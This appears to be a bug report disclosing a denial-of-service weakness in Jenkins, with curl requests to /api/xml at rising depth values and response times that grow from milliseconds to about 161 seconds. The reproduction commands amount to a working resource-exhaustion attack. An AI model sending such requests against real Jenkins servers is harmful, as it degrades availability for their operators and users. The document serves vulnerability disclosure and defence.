| Jenkins seems vulnerable to denial of service attacks when exploring the /api/xml?depth=XXX. For instance, taking a public internet jenkins instance and executing:
┬─[saamorim@saamorim-vbox:~]─[08:47:17]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=0"
time_total: 0,018878
┬─[saamorim@saamorim-vbox:~]─[08:47:36]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=1"
time_total: 0,021458
┬─[saamorim@saamorim-vbox:~]─[08:47:38]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=2"
time_total: 0,094432
┬─[saamorim@saamorim-vbox:~]─[08:47:39]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=3"
time_total: 0,124732
┬─[saamorim@saamorim-vbox:~]─[08:47:40]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=4"
time_total: 0,439020
┬─[saamorim@saamorim-vbox:~]─[08:47:42]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=5"
time_total: 1,279623
┬─[saamorim@saamorim-vbox:~]─[08:47:44]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=6"
time_total: 2,344852
┬─[saamorim@saamorim-vbox:~]─[08:47:48]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=7"
time_total: 7,749517
┬─[saamorim@saamorim-vbox:~]─[08:47:59]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=8"
time_total: 25,973226
┬─[saamorim@saamorim-vbox:~]─[08:48:27]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins..local/api/xml?depth=10"
time_total: 161,02
Not only time increases but CPU also increases. This is the CPU graph of a depth=10 request 
|
